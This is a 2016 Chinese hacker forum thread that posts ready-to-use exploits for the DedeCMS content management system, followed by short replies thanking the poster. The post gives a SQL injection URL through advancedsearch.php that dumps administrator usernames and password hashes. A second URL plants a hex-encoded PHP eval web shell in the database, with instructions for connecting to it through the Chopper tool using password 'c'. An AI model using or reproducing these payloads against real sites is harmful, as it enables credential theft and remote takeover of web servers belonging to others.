dedecms最新注入和getshell漏洞利用

C4r1st 发表于 2016-9-8 22:29:41

条件利用：

1.漏洞代码在/plus/advancedsearch.php 文件中
2.php.ini要开启session.auto_start = 1
3.必须知道一个存在的mid，需要后台有添加自定义搜索模型

爆账号密码poc：

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

getshell poc:

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123

然后菜刀链接http://localhost/dedecms/plus/mytag_js.php?aid=1 密码:c

w2015 发表于 2016-9-8 23:50:08

沙发。又是一波干货。

Te5tB99 发表于 2016-9-9 00:01:24

我是不是你最疼爱的人，你为什么不说话。我害怕好好看看这个漏洞吧

sladjfksld 发表于 2016-9-9 17:45:19

敢不敢晚点时间再爆料。。。。生活都没有意义了。。。。

xema 发表于 2016-9-9 18:27:57

这个好，我先知道多少沦陷了

任我狂 发表于 2016-9-10 08:59:06

这个可以，收下了:lol

wanshine 发表于 2016-11-1 15:58:37

感谢分享，学习学习

页: [1]

红客联盟 - 由08安全团队运营's Archiver

dedecms最新注入和getshell漏洞利用